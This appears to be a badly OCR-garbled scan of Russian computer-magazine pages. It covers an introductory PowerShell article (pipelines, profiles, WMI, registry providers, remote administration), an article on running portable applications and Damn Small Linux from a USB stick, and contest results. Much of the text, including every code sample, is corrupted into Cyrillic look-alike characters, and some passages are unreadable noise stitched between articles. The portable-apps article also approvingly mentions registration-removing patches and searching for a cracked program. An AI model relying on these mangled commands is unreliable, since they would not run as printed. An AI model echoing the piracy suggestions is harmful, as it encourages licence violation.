"Н-ГІісгосп-ГЬ Са і-ротлЬ іорт „ Ф“Р1і-пга-5ііГі Спгрпгнякіпп - Ъ - ІЬггіпппгі .. 5 -Ц-м Ьіпуі.оп- .» 
и -Ііе _ I иіт гніЬІ 1акі«за- іл пик ’Ёічіоксй оп зн>иі ь іулісл. Йгаіу ічлъ асг-ірЪа Іі-йіі 
Ь то с к о Й риЬІ і-с Ъа г н . 

іи I НйУ-Біг ічіп 10 I ѣа лои ѵип ІЙ] Кип -ппсе [ПІ ПІи&і^і інііі (?] Мйіп 
СіІяГіьиІк і- 'Т ,Н Э=_ 



РоѵѵегЗІпеІІ задает риторический вопрос: можно ли запускать ПО от Майкрософт? :) 



ют автоматизировать любое действие. Нужно 
только захотеть. Предлагаю рассмотреть пару 
примеров. 

Допустим, у нас в папке вперемешку свалены 
куча разных файлов и статья для X с расшире- 
нием бос. Легким движением руки мы получаем 
информацию о всех документах ѴѴогсГа: 

ѲеІ-СІііІсІЛет I зоіІ-оЬіесІ ехіепзіоп I зеіесі пате, 
ІепдіГі, ехіепзіоп I ѵѵііеге { $_.ехІепзіоп -ед ".сіос" } 

Чтобы добиться результата, я использовал не- 
сколько стбіеіз. Данные между ними последо- 
вательно передаются с помощью так называе- 
мого пайпа (I — полный аналог из ЬазН’а). Если 
читать команду дословно, то получается такая 
картина: вывести файлы, отсортированные по 
расширению, с информацией об имени файла, 
размере и расширении, которые удовлетворя- 
ют требованию «расширение равно .бос». Все 
просто и логично. Браво, М3! 

Естественно, команды совершенно необяза- 
тельно набирать вручную в командной строке. 
Можно заранее определить нужную последо- 
вательность команд и запихнуть их в скрипт. 
Сценарии РоѵѵегЗИеІІ представляют собой 
обычные текстовые файлы с расширением рзі 
(в старых версиях — .тзИ). Попробуем напи- 
сать простенький сценарий, в котором опреде- 
лим функцию для вывода общего количества 



"Она содержит " $і "элементов" 
зеі-аііаз сізг сііг-зіге 

} 

С помощью команды рагат мы присваиваем пе- 
ременной $біг значение, которое было переде- 
лано в качестве параметра функции (если бы их 
было несколько, то нужно было бы последова- 
тельно указывать несколько переменных через 
запятую). Далее получаем список директории 
и заносим его в переменную $ІізІ. Для каждого 
элемента этого списка делается следующее: 
увеличивается счетчик общего количества 
данных (переменная $і), а к переменной $зіге 
прибавляется размер текущего объекта. Далее 
информация выводится на экран посредством 
команды ѴѴгіІе-ЬозІ, а также назначается ко- 
роткий алиас для быстрого вызова команды. 
Запустить скрипт очень просто — ./”Эіг 8 і 2 е. 
рзі". Другой вариант — записать функцию в 
профайл, речь о котором пойдет ниже. 



Фас! Профиль! 



Все, что находится в файле-профайле, испол- 
няется со стартом РоѵѵегЗІпеІІ автоматически. 
Этот файл может лежать в таких местах: 
1 и «\ОоситепІзапбзеПіпдз\АІІизегз\ОоситепІз\ 
РзСопІідига!іоп\ргоІіІе.рз1 »; 

2.«\ОоситепІзапбзеІІіпдз\АІІизегз\\ОоситепІз\ 
РзСопІідигаІіоп\<зІпеІІІб>_ргоІіІе.рз1 »; 



соипі + " Ргосезз: " + (деЦргосезз).соип1 

ѴѴгіІе-НозІ ("Р5 " + $(деМосаІіоп) +">") -попеѵѵііпе 
Чогедгоипсісоіог Мадепіа 
геіит " " 

} 

Если добавить эту функцию в свой профайл, 
то приглашение, которое выводит текущий 
путь, окрасится в красивый фиолетовый цвет, 
а в заголовке окна покажется количество эле- 
ментов в текущем каталоге и число запущенных 
процессов. Вообще, если немного повозиться 
с тюнингом профайла, то можно нехило подна- 
таскаться в создании скриптов и заметно уп- 
ростить использование шелла. Например, ник- 
то не мешает тебе подсвечивать разные типы 
файлов соответствующими им цветами. Это не 
только радует глаз, но и заметно упрощает на- 
вигацию по файловой системе. А реализуется 
проще простого: 

$ІізІ = деІ-сЫІсІЛет I зогі-оЬіесІ: 

Лэгеасіі ($оЬ]ІІет іп $ІізІ) { 

Л ($оЬіКет.АПгіЬиІѲ5 -сопіаіпз "Оігесіогу") { $7дс="суап" 
} 

еІзеіТ ($оЬ]Кет.ЕхІепзіоп -ед ".рзі") { $?дс="Ыие" } 
еІзеіТ ($оЬ]Ііет.ЕхІепзіоп -ед ".ехе") { $7дс="дгееп" } 
еІзеіТ ($оЬ]ІІет.ЕхІепзіоп -ед ". 2 ір") { ${дс="гесІ" } 
еІзеіТ ($оЬ]Кет.ЕхІепзіоп -ед ".гаг") { ${дс="гесІ" } 
еізе { $7дс="дгау" } 

ѵѵгііе-іпозі $оЬіІІет.І\Іате, $оЬ^ет.І_епдІІ-і, $оЬ|11ет. 
І_аз*ѴѴгЛеТіте Чогедгоипсісоіог $^дс 
} 

Формальное описание: получаем содержимое 
директории как массив, парсим его с помощью 
конструкции іТ/еІзеіТ/еІзе, задаем значение пе- 
ременной $Ідс. Впоследствии, когда строка бу- 
дет выводиться на экран, с ее помощью будет 
назначен цвет текста. 



Интерфейс управления системой 



А теперь с помощью функции получим список, 
установленного в системе оборудования: 

Рипсііоп ЗІіоѵѵ-ІпзІаІІесІЗоЛѵѵаге { 

$ргосІ = ОеІ-ѴѴтіОЬіесІ ѵѵіп32_ргосІисІ 

$ргосІІ 50ГІ пате ІЛ ІМате, Ѵегзіоп, Ѵепсіог, 
ІпзіаІІсІаІе -а 
} 

зеі-аііаз зіз ЗІіоѵѵ-ІпзІаІІесІЗоЛѵѵаге 




У ДАЛЕННОЕ АДМИНИСТРИРОВАНИЕ 



Народные умельиы уже написали клиент-серверный скрипт, позволяющий работать в РоѵѵегЗІіеІІ на 
расстоянии. Разработка доступна на сайте Іі»р://тзІі^огіип.ЫоазроТсот/2006/03/ро\л/егзІіеІІ-гето1іпа- 
ЬѳІа-апсІТиШге.ІіІтІ и весит аж 300 Кб. Сейчас расскажу, как его поставить. Выкачивай архив, 
распаковывай и запускай в РоѵѵегЗІпеІІ. Переходи в папку с сервером (Роѵѵег5ІіеІІВетоІіпа\зегѵег) и 
запускай инсталляционный скрипт: ./'іпзІаІІ.рзТ. Не забудь одну важную вещь. В новом шелле есть 
такая фича, как ехѳсиііоп роіісіез, которая контролирует режимы запуска скриптов. По умолчанию 
ни один сценарий ѵ тебя не запустится (это для твоей же безопасности сделали наученные горьким 
опытом Зсгірі НозіУ Чтобы активировать возможность запуска скриптов, необходимо выполнить 
команду ЗеІ-ЕхѳсиІіопРоІісѵ РіѳтоІеЗіапѳсІ. устанавливающую разрешающий режим. Подробности 
по теме описаны в справке: Оеі-Неір аЬоиІ зідпіпа I тоге. Теперь вернемся к установке. После ее 
подтверждения в системе обозначится новая служба РоѵѵегЗІіеІІНетоІіпа — ее необходимо запус- 
тить. а также настроить на автоматический запуск. Это делается через «Панель управления -> 
Администрирование -> Службы». По умолчанию шелл принимает подключения от администратора 
с локалхоста. а для того, чтобы разрешить доступ другим клиентам, необходимо исправить файл 
изег.хті. Ну а дальше? Дальше надо аналогично установить клиентскую часть и радоваться жизни, 
подключаясь к удаленному компу: ./'Зіагі-Ветоіеі'іозі.рзі'. 



файлов в заданном каталоге и их размера. На 
практике это реализуется очень просто. 

Ліпсііоп сІіг_зі 2 е 
{ 

рагат ($сііг) 

$ІізІ = деі-сіііісіііет $сііг 
Лэгеасіі ($оЬ іп $ІізІ) 

{ 

$і++; 

$зі 2 Ѳ = $зі 2 Ѳ + $оЬ.І_епдІІп; 

} 

уупіе-ііозі "Размер директории: " $зі 2 Ѳ 



3. «Мои документы\РзСопІідига!іоп\ргоІіІе.рз1 »; 

4. «Мои документы\РзСопІідига 1 :іоп\<зИеІІІб>_ 
ргоТіІе.рзІ »; 

Что пихать в профайл, я думаю, понятно: на- 
стройки приглашения, установку алиасов для 
команд, выполнение каких-нибудь будничных 
операций, не требующих твоего вмешательс- 
тва. Приведу небольшой пример кода от гиков с 
ИДр://тзІіІогІип.Ыоазро 1 .сот/ : 

Ліпсйоп рготрі 
{ 

$НозТиі.га\л/иі.ѴѴіпсІоѵѵТШе = "Рііез: " + (деРсЫШет). 



Ты еще раз убедился, что скрипт написан пол- 
ностью с использованием стбіеіз. Этот код с 
вызовом функции ОеІ-ѴѴтіОЬіесІ я привел не 
просто так. ѴѴМІ — это ѴѴіпбоѵѵз Мападетепі 
Іпзігитепіаііоп, то есть программный интер- 
фейс управления системой. С помощью ѴѴМІ 
возможно управлять операционкой и получать 
информацию о системе. Например, ты легко 
можешь получить настройки БИОСа: 

дѵѵті ѵѵіп32_ВІ05 

ЗМВІОЗВІОЗѴегзіоп : АЗЫЗ А7Ы8Х2.0 АСРІ ВІ05 
Веѵ 10 
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Большинство команд РоѵѵегЗИеІІ имеют ипіх-ііке алиасы. 
Как же приятно набирать роднѵю глазу Із. а не біг. 

Телнетоподобный РоѵѵегЗІлеІІ Ветоііпа. Ошибка 



подключения — видимо, сервер не запушен. 



*■ и< - 



3 

Изволите список переменных? Любую команду можно в любой момент 

Получите! дополнить нажатием клавиши ТаЬ. 

Знакомая фишка, да? 

Вот так выглядит подробная справка по команде 
Оеі-Соттапб. В лучших традициях тап. 



. 4 р Г^і-ь, , н 



Софтварный доклад 







Навигация по реестру ничем не 
отличается отФС 
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ЭТИ ФИШКИ ПОМОГУТ ТЕБЕ В НАСТРОЙКЕ АВТОМАТИКИ 

РоѵѵегЗІіеІІ предоставляет удобные средства по работе с системными службами. Следующая команда, к примеру, выводит 
список работающих служб: 

сюі-зегѵісе I ѵѵІіеге-оЬіесІ ( $ .Зіаіиз -ед "Виппіпд" I 

Внимательно изучи ключи командлета зеі-зегѵісе. С его помощью легко меняются любые параметры служб, например тип 
запуска: 

зеі-зегѵісе <имя службы> -ЗіагШрТѵре МапиаІ 

Новый шелл от МісгозоК имеет в своем арсенале десятки служебных переменных, использованием которых не стоит пренеб- 
регать. Например, переменная $І_А5ТЕХІТСОРЕ всегда содержит код завершения последней запущенной программы. Заюзать 
ее проще простого. Например, команда ріпа. в случае недоступности удаленного хоста, возвращает в качестве кода заверше- 
ния единицу, а в случае получения ІСМР-ответа (то есть удачного подключения) — ноль. Таким образом, написание простейше- 
го скрипта для мониторинга работоспособности удаленного хоста сводится к одной-единственной конструкции іТеізе. 



- 



провайдера, необходимо использовать команду ЗеЫ_осаІіоп. Список 
всех доступных вариантов выдаст команда (ЗеІ-РЗРгоѵібег: 





ІМате 


СараЬіІШез 


Огіѵез 


МапіЛасШгег : РІіоепіх Тесііпоіодіез, І_ТО 


АІіаз 


ЗІіоиІсІРгосезз 


{АІіаз} 


ІМате : РІіоепіх - АѵѵагсІВІОЗ ѵб.ООРО 


Епѵігоптепі 


ЗІіоиІсІРгосезз 


{Епѵ} 


ЗегіаІЫитЬег : ххххххххххх 


РіІеЗузІет 


Ріііег, ЗІіоиІсІРгосезз 


{С, О, Е, Р.. 


Ѵегзіоп : ГМѵісІіа - 42302е31 


Рипсііоп 


ЗІіоиІсІРгосезз 


{Рипсйоп} 




Ведізігу 


ЗІіоиІсІРгосезз 


{НКІ_М, ИКСЫ} 


Маленькое пояснение: дѵѵті — это короткий псевдоним все той же Оеі- 


ѴагіаЫе 


ЗІіоиІсІРгосезз 


{ѴагіаЫе} 


ѴѴтіОЬіесТ Штука поистине уникальная: с ее помощью можно узнать о 


СегМісаІе 


ЗІіоиІсІРгосезз 


{сегі} 



всехдевайсах, присоединенныхктвоемукомпу(принтеры, сканеры), се- 
тевых настройках, легко управлять софтом, установленном на машине 
(также, как в меню «Установка и удаление программ»), и многое другое. 
Смотри, как вывести свободное место на своих дисках: 

деТѵѵтіоЬіесІ ѴѴіп32_І_одісаЮізк I зеіесі сІеѵісеісЦгеезрасе.зіге 

сіеѵісеісі Ігеезрасе зіге 



Скажем, если ты хочешь изучить содержимое реестра, то должен пе- 
реключиться на него с помощью команды ЗеЫ_оса1:іоп НКІ_М:\. Теперь 
просмотри список ветки НКІ_Ѵ с помощью Із. Вывод команды отображен 
на скрине — глянь туда. Т ы можешь творить с реестром все, что хочешь. 
Его ветки теперь для тебя, как папки, и ты можешь бродить по ним через 
«об». А значения ключей легко выводятся саГом. Это, кстати, одна из 
самых мощных и полезных фич РоѵѵегЗИеІІ'а. 



А: 

С: 6861377536 27135164416 

О: 1317060608 18867748864 

Для этого в качестве параметра для (ЗеІ-ѴѴтіОЬіесІ мы передали флаг 
ѴѴіп32_І_одісаЮізк и таким образом получили полную статистику по дис- 
кам с нужными нам полями. Набери в консоли «ѲеІ-ѴѴтіОЬіесІ -Іізі» — и 
ты подивишься разнообразию объектов, о которых собрана информа- 
ция. Но едва ли среди этого огромного списка ты найдешь то, что тебе 
действительно нужно. Но тут есть простой рецепт. Набери в консоли: 



Это только начало приключений 



Признаться, новая разработка от МісгозоЙ настолько многообразна и 
функциональна, что едва ли я охватил даже тысячную часть всех ее воз- 
можностей. Но я постарался показать самый сок и основной подход в 
реализации сценариев. Теперь — дело затобой. Всевозможные НОѴѴТО 
и подробная документация доступна в интернете, но пока только на анг- 
лийском языке. Но штуковина стоит того, чтобы с ней разобраться, нс 



деІ-ѴѴМІОЬіесІ -Іізі I ѵѵііеге {$_ -гпаісіі "что тебя интересует"} 

Конструкция, указанная после пайпа (I), — это что-то вроде аналога дгер 
в юниксе. То есть она фильтрует строки по содержимому, и после ввода 
этой команды ты получишь только те строки, в которых содержится инте- 
ресующая тебя последовательность символов. 



Необычные провайдеры 



Перейдем к еще одной новаторской фиче РоѵѵегЗІіеІІ. Ребята из МісгозоЙ 
подумали и решили максимально упростить работу пользователя с раз- 
личными структурами: файловой системой, реестром, множеством пере- 
менных. Для всех них определены несколько общих методов, позволяю- 
щих легко манипулировать данными. Вот пример. Допустим, мы выбрали 
в качестве структуры (в плоскости РоѵѵегЗІіеІІ — провайдера) файловую 
систему и совершенно обычным образом перемещаемся между папками 
и дисками с помощью команды об. Зашли в диск С:\ и просмотрели со- 
держимое с помощью Із. Атеперь выберем в качестве структуры реестр. 
По большому счету, он очень схож с файловой системой: разделы или 
ветки — это папки, а ключи реестра — это файлы. Так почему бы не пе- 
ремещаться по ним аналогичным образом? Провайдером по умолчанию, 
что логично, установлена файловая система(РіІеЗузІет). Чтобы сменить 



Е] 

Название Мопаб пошло из философии Готфрида-Лейбница — «мона- 
дологии». которая говорит о том, что весь мир состоит из множества 
фундаментальных единиц (монад), которые гармонично соединены 
между собой. В РоѵѵегЗІіеІІ этими частицами являются сшбіеі’ы. Что ни 
говори, а с этим не поспоришь. 

:1 

Рекомендую посетить ѵѵѵѵѵѵ.зсгір^-собіпа.іпіо. один из немногих ресур- 
сов с информацией о РоѵѵегЗІіеІІ на русском языке. 

Большое количество полезных скриптов лежит на ѵѵѵѵѵѵ.гезкіі.пеі. Их 
тоже можно вставить в свой профайл в виде функций. Пригодятся. 
Хороший гид по РоѵѵегЗІіеІІ ты найдешь на сайте: 
Ііир://агзіесІіпіса.сот/аиібез/о^Ііег/т5Іі.аг5/1.Іігт 
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Новое измерение 



... Ска мира вания документов на рабочем ' 

месте: сканеры ГиііЕзу ІІ-512ШС и ІІ ІЭ20С 

сюякік едииртиня до эй стопчи. *іи БРавріівд’в 
1ж^[*ту 'я чег*й-йс«м іі и^-гівиражишгсѵпі^дкы.іні 
суіітеч отошв ииапійвфіга 
Лйліоэлвііи для ььіндгіяілвд олт-рол. 

>іііл р.ілн^ипо чалрегъ. двойня* ла.'л™ йтлп- 
' здлярэдопс стали дорыто» ндндо 

фОДи.іГЛ Г ' : -<ТНіІ ІІЛЛЩ ІфДО»*І» .ЛЛТ&** И 
Ч.ірРСИЙі ЫІНІІІ.ГЙ! 

адгвдгпЕйН' дос>ѵ , '<іні' а кгипі^о ни «хшли Р.. н5 
■ пняілякрсміАДОЛсвді гд Зіціідиіс! 

«здп г - г Ы 20С .'ііпогігік.! ^ 1)ѵді и и лпамікт 
ачцмя дли іі :,'.- пи ІІ-52Д5С і (кнпосі нздпмлт®: 



гісгсминк Бсвплег-ШГа "Яд іиіііі і емл 

Белев логдобю» нііфврылімк к ні.1 



■ ім|і: --; и. ►: пцгр.... Ли 

»4И Ч ■ V ЦИ'М №* 





А ТАМ ВЕЗ ДЕ УСТАНОВЛЕН ИНТЕРНЕТ ЕХРЮВЕ Р. ПРИЧЕМ 
УСТАНОВ ИТЬ СВОИ ПРОГ РАММЫ НЕЛЬЗЯ — СИСТЕМА ТУТ 
ЖЕ НА ПОМИНАЕТ О НЕДОСТАТОЧНОСТИ ПРАВ. ЕЩ Е БЫІ 
ВЕДЬ АДМИНИС Т РАТОР КАТЕГОРИ ЧЕ СКИ ПРОТИВ САМОДЕ- 
ЯТЕЛЬНОСТИ. ВОТ СИЖУ ТЕПЕРЬ Й ДУМАЮ: ТО ЛИ ОСВАИ- 



ВАТЬСЯ С ПРЕДЛОЖЕННЫМ НАБОРОМ УБОГОГО СОФТА, ТО 



И СОСТАВИТЬ СВОИ. 



НА ЧУЖОМ Ж Е КОМПЬЮТЕРЕ МНЕ ПОСТОЯ ННО ПЫТАЮТСЯ 
ПОДСУНУТЬ ЧТО-ТО СВОЕ. ВОТ ПРИХОЖУ В ИЗДАТЕЛЬСТВО 



ДОМА Я ИСПОЛ ЬЗУЮ БР АУЗЕР ГІВЕ ГОХ, ТОЛКО ВО НАСТРО- 
ЕННЫЙ И ВООРУЖЕННЫЙ ВСЕВОЗМОЖНЫМИ ПЛАГИНАМИ. 



ѵѵѵѵѵѵ. риг іасіеаррз. сот/ 

аррз/іпіегпеі/Ьгоѵѵзегз/ 

рогіаЫѳ_іігеіох 

Орега@ІІЗВ 

ѵѵѵѵѵѵ. орега-изЬ. сот 

ТНе Ваі! Ѵоуадег 

ѵѵѵѵѵѵ. гіІІаЬз.сот/ги/ргойисІз/ 

ѵоуадег 

РогіаЫе ТИипсІегЬігсІ 

ѵѵѵѵѵѵ. рогіаЬІеаррз. сот/ 

аррз/іпіегпеі/етаіІ/рогіаЫе_ 

ІНипсІегЬігсІ 

ТоіаІ Соттапсіег 

ѵѵѵѵѵѵ. дНізІег. сот 

Раг 

ѵѵѵѵѵѵ. гагІаЬ.сотДаг_ 

тападег.НІт 

РіІеЯІІа 

ТіІегіІІа.зоигсеТогде.пеІ; 

МігапсІаІМ 

ѵѵѵѵѵѵ . т і гап сі а-і т . о г д 

дір 

ѵѵѵѵѵѵ.дір.ги 

&ЯО 

ѵѵѵѵѵѵ . г е \ еио . с о т/& В О 
РогіаЫе КІѴІ) 1 .0 
ІоИпИаІІег.сот/іІі/тогіІІа/ 
рогіаЫе_пѵи/ 

ХАМРР 

ѵѵѵѵѵѵ . ар ас Н еіг і е п сі з . о г д/е п/ 

хатрр.НІтІ 

ХМРІау 

ѵѵѵѵѵѵ. ип4зееп. сот 
РогіаРиТТѴ 

зосіаІізІзизЫ.сот/роіІариПу 
Ретога ІІЗВ йізк ОиагсІ 
ѵѵѵѵѵѵ. гісіізкіііз. сот 
КееРазз РаззѵѵогсІ Заіе 
кееразз.зоигсеіогде.пеі 
РЗіаП 

ѵѵѵѵѵѵ. редіор. сІе/зІаП 

НР ІІЗВ Эізк Зіогаде Рогтаі 

ТооІ 

зеІісІезігисі.пеѴтізс/изЬЬооі 







РогІаЫе Аррз 

РѳшениеТонѳ^Жжѳ, есть. Ведь програм- 
мы можно записать на флешку и носить 
с собой. Но тут опять загвоздка. Не полу- 
чится просто установить приложение на 
сменный носитель и запускать его с чужо- 
го компа. В большинстве случаев возник- 
нут проблемы с реестром, не говоря уже о 
всевозможных библиотеках и драйверах, 
активно используемых приложениями. 
Определить зависимости несложно, но 
для установки того же драйвера тебе, как 
минимум, понадобятся права администра- 
тора. А в этом случае наша затея теряет 
смысл. К счастью, нашлись энтузиасты, 
которые озадачились проблемой и начали 
разрабатывать специальные версии по- 
пулярных приложений, адаптированные 
для запуска с ІІЗВ-накопителей. В сети 
даже появилась новая категория про- 
грамм — рогіаЫе арріісаііопз. Вот с ними 
нам и предстоит сегодня познакомиться. 
Начнем, пожалуй, с браузера. 




Ецэаѵзеі 

Чащ^зсего я запускаю браузер — это 
факт. Я настолько привык к удобному 
интерфейсу РігеТох, его впечатляющей 
расширяемости и стабильной работе 
(для любой уязвимости тут же выходит ап- 
дейт), что использовать что-то другое уже 
попросту не могу. Поэтому на флешке я 
всегда ношу специальную портируемую 
версию огненной лисы, запускаемую без 
установки. РогіаЫе РігеТох, а именно так 
называется разработка, распространя- 
ется в виде архива, который легко рас- 
паковывается на флешку, после чего 
успешно используется так, как если бы 
это был обычно установленный браузер. 
Портируемый РігеТох легко поддается ру- 
сификации с помощью специального хрі- 
файла с локализацией, однако на сайте и 
форуме ѵѵѵѵѵѵ.тогіііа.ги всегда можно най- 
ти готовую русскую версию модифициро- 
ванной лисы. Важно, что подобные манев- 
ры никак не влияют на функциональность 
программы: ты по-прежнему можешь под- 
ключать любые расширения. Хороший 
сборник плагинов, кстати, компонует и 
распространяет всетотже сайт тогіііа.ги . 
Поклонникам Орег’ы аналогичным обра- 
зом подойдет программа Орега@ІІ5В. 



Почтовый клиент 

гагтгг^^гтетовом клиенте, то 
для поклонников ТТіе ВаТ! подготовлен 
беспроигрышный вариант. Сама ВШаЬз, 
то есть разработчик мыши, изготовила 
портируемую версию своего приложе- 
ния. Чудо называется ТНе Ваі! Ѵоуадег и 
устанавливается на нужный том (флеш- 
ку) с помощью специального мастера. В 
результате получается полноценный ТИе 
Ваі со всеми функциями и наворотами, но 
на сменном носителе. Огорчает только, 
что программа платная и очень капризная 
по отношению к регистрационным дан- 
ным. Хуже всего то, что разработчиками 
применяется двухступенчатая система 
регистрации: сначала с помощью регис- 
трационного ключа, а потом по иденти- 
фикатору сменного устройства. В инете 
несложно найти патчи, которые эти огра- 
ничения снимают, но все-таки придется 
повозиться. Если такого желания нет, то 
рекомендую другой вариант — РогіаЫе 
ТИипбегЬігсІ. Не прога, а настоящая наход- 
ка: функциональный почтовикнафлешке, 
да еще с открытыми исходниками. 








БУДЬ В 



Мы подводим итоги конкурса, в котором мы вместо с компа- 
нией Соііп'з разыгрывали три пары джинсов. Чтобы победить, 
нужно было прислать фотографию своих самых старых и ис- 
терзаных штанов. 



Второе место занял Сергей Якубович ( зегаеі-пе@таіІ.ги ). которому старые 
джинсы очень мешают в жизни. Дырки на коленях, проеденные кислотой, от- 
верстия в старых заплатках — это только часть украшений его штанов. 



РС_20ЫЕ 



Многие другие небольшие І_іѵеСЛ-дист- 
рибутивы можно загружать с 115В. В том 
числе 5І_АХ (ѵѵѵѵѵѵ.зіах.огд), Рирру Ыпих 
(ѵѵѵѵѵѵ.рирруііпих.огд), ІЫ5ЕВТ (ѵѵѵѵѵѵ. 
іпзісІе-зесигііу.сІе/іпзегСеп.ІтітІ). 



Всего понемножку 

Оче^Нзажн^имет^^собой файло- 
вый менеджер, так как стандартный 
проводник может вывести из равно- 
весия кого угодно. Что касается ТоіаІ 
СоттапсІеГа и Раг’а, то никаких про- 
блем не возникнет. Достаточно ско- 
пировать папки сустановленными 
приложениями на флеш-нако- 
питель и совершенно спо- 
койно их использовать. 

Отличной заменой ^ 
встроенному РТР- 
клиенту станет бесплат- 
ное приложение РіІе2іІІа. Тулза, 
работающая без дополнительной 
установки, удовлетворит даже самых 
требовательных пользователей. По- 
пулярные мессенджеры Мігапба ІМ, 
цір и &РЮ также отлично функциони- 
руют без дополнительных доработок. 
Для этого нужно лишь скопировать на 
флешку все рабочие файлы, а также 
файлы-профили. Нужен портатив- 
ный НТМЬ-редактор? В этом случае 
идеально подойдет РогіаЫе ІЧѴІІ. Не 
Огеатѵѵеаѵег, конечно, но для быст- 
рого редактирования веб-документа 
в непривычных условиях вполне сой- 
дет. Кстати, нафлешке возможно раз- 
местить функциональный веб-сервер 



Представь: установил программу на флешку и можешь запускать 
ее откуда угодно. Хороша идея, да? 

Воплощением этой мечты в жизнь занимаются сразу несколько 
команд разработчиков. Недавно на рынке даже появилась целая 
платформа ЦЗ и созданные на ее основе накопители ( гогого.иЗ.сош/ 
зтагігігіѵез/сіеіаиіі.азрх) . Немногим дороже обычных флешек, 
они предоставляют возможность запускать любые приложения 
и драйвера с накопителя посредством специальной оболочки, не 
оставляя при этом следов в основной системе. Реализация систе- 
мы зашита внутрь самой флешки. 

Совершенно иное решение предоставляет компания ШпзІаІІ 
( Шпзіаіі.сот/ргогіисіз/оѵегѵіего.р іі р) . Их продукт — Ѵігіиаіігаііоп 
ЗиЛе — позволяет программно поместить приложение любой 
сложности внутрь специального контейнера. Такой контейнер 
представляет собой обычный ехе-файл, состоящий из специаль- 
ной виртуальной среды, а также всех необходимых для работы 
приложения драйверов и ПИ-библиотек. Модифицированное та- 
ким образом приложение легко запускается на других компьюте- 
рах, даже с абсолютно «чистой» системой. Но не спеши радовать- 
ся. К сожалению, все мои попытки скачать программу и найти ееі 
взломанный вариант не увенчались успехам. Может быть, тебе 
повезет больше? 



Флешки в последнее время сильно подешеве- 
ли: накопитель с объемом 1 Гб уже не стоит не- 
скольких тысяч рублей. Шестьсот-восемьсот 
рублей — это нормальная цена. Дешевеют и 
портативные жесткие диски, предназначен- 
ные для подключения к ноутбуку. Обрати на них 
внимание, если требуется большой объем. 



Итоги конкурса Соііп'з 



БУДЬ СВОБОДНЫМ 



И, наконец, третье место отдаем Витьку из Солнцева. Этому парню джинсы порвали фут- 
больные фанаты клуба Лисма-Мордовия. Изорвали штаны специально, чтобы он выиграл 
новые от Соііп'з. Старые были с Черкизовского рынка. 
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/5/ По сути, тот же РігеТо лишь разницей, что 
для запуска используется ‘другой исполняемый ^ 



/6/ йатп ЗтаІІ Ыпих: любые пр^лЙжения 
внутри 50 Мб дистрибутива 




(ХАМРР), чтобы тестировать и 
отлаживать динамические РегІ- и 
РНР-сценарии. 

В нашем деле нередко требуется полу- 
чить удаленный доступ к компьютеру. В 
принципе, вполне можно использовать 
любимый РиТТѴ, распространяющийся в 
виде отдельного ехе'шника. Но есть одно 
«но». По умолчанию 53Н-клиент хранит 
настройки и параметры подключений в 
реестре, поэтому на каждом новом ком- 
пьютере его придется конфигурировать 
заново. Специальная версия РогІаРиТТУ 
быстро решит эту проблему, сохра- 
нив конфиг в ХМ1_-файле. 

Теперь о мультимедия. ѴѴіпатр не 
всегда успешно работает на флеш- 
ке. Но все его функции отлично выполня- 
ет портируемый плеер ХМРІау, в чем ты 
скоро убедишься. Тут тебе и поддержка 
всех популярных форматов (ООО, МРЗ, 
ѴѴМА и т.д.), и плей-листов Р1_3/М311/А5Х/ 
ѴѴАХ, и даже скинов, которые визуально 
позволяют сделать копию винампа. 

Безопасность 

555ё^вноспр?тать конфиденци- 
альные данные позволяют всевоз- 
можные системы шифрования. Мы 
уже писали о них в одном из наших 
номеров. Тогдашние победители обзора 
(ТгиеСгирІи ВезіСгурІ;) хотя и позволяют 
хранить зашифрованный контейнер 
на внешнем носителе, но требуют 
установки в ОС специального. Другими 
словами, примонтировать зашифро- 
ванный диск на другом компьютере без 
предварительной установки софта ты 
не сможешь. Вряд л и кого заинтересу- 
ет идея носить компромат в кармане, 
поэтому пришлось искать альтернатив- 
ный продукт. Решение нашлось очень 
скоро. Отказавшись от контейнера в 
виде логического диска, можно легко 
оперировать отдельными файлами или, 
что удобнее, каталогами при помощи 
таких утилит, как Вегтюга ІІЗВ Оізк (ЗиагсІ. 
Рассказывать о программе, по большо- 
му счету, нечего. Она просто эффектив- 
но шифрует данные с использованием 
криптостойких алгоритмов. 

Тем, кто для разных сервисов в интер- 
нете использует уникальные пароли, 
особенно рекомендую разместить 
на флешке программу для хранения 
паролей. Ты не ошибешься, если оста- 
новишь свой выбор на утилите КееРазз 
Раззѵѵогб Заіе. Пароли останутся в 
сохранности благодаря непробиваемой 
системе шифрования, а чрезвычайно 
удобный интерфейс поможет быстро 
найти то, что нужно, и освежить память. 



Программахороша во всех отношениях: /7/ 
разработчики даже позаботились о том, 
чтобы информация о паролях не была 
перехвачена кейлоггерами, а это многого 
стоит. 

Р^ийские^словия 

Мал^аписат^ірофаммьі на диск 

— нужно позаботиться об их комфортном 
запуске. И с этой задачей с доблестью 
справляется утилита РЗіагі. По сути, это 
обычная панель, на которой размещены 
ярлыки для запуска всевозможного соф- 
та. Но у нее есть специальный режим, 
позволяющий работать с программами 
на сменном носителе. Фишка в том, что 
РЗіаіІ не привязывается к конкретной 
букве диска во время создания ярлыков. 

И если в одном компьютере флешка 
монтируется как диск Р: , а на другом 

— Ѳ:, то любые ярлыки по-прежнему 
будут ссылаться на программы как ни в 
чем не бывало. 

Сразу после запуска в трее появляется 
РЗіагЦ позволяющая запустить любое 
приложение с флешки за считанные 
секунды. Более того, для каждой 
портированной проги можно настроить 
запуск по расписанию или автостарт (во 
время запуска самого РЗіагІ’а). У меня, 
например, автоматически запускает 
Мігапба. А вот наладить автозапуск, как 
в случае СО/ОУО дисками, не получит- 
ся, и виной тому — ограничения самой 
ѴѴіпбоѵѵз. Справедливости ради замечу, 
что некоторые модели флешек такую 
возможность все-таки предоставляют. 

Чеотовск^маленькийлинѵ^ 

Паоо^гоорногософт^ефлешк^^ 

— это уже хорошо. Но ты никогда не за- 
думывался, что на ней можно разместить 
целую операционную систему? Просто 
вставил носитель в ІІЗВ-разъем и грузи 

с него настроенную под себя ось без 
каких-либо ограничений и квот, препятс- 
твующих установке любимых программ. 
Воплотить мечту в реальность поможет 
любой ЫѵеСО — дистрибутив пингвина, 
но я рекомендую воспользоваться Оатп 
ЗтаІІ Ыпих ( ѵѵѵѵѵѵ.батпзтаІІІіпих.ога У 
Суди сам: в 50-метровый образ тукса 
входят полноценные мультимедиа-утили- 
ты (ХММЗ), РТР-кпиент, браузер РігеТох, 
почтовый мыльникЗуІрбееб, текстовые 
и графические редакторы, проги для 
просмотра документов, файловые ме- 
неджеры, мессенджер, ѴІМС- и Рбезкіор- 
клиенты для доступа к удаленному компу. 
Более того, ты легко сможешь подклю- 
чить ОЗЫпих к локалке или инету, благо и 
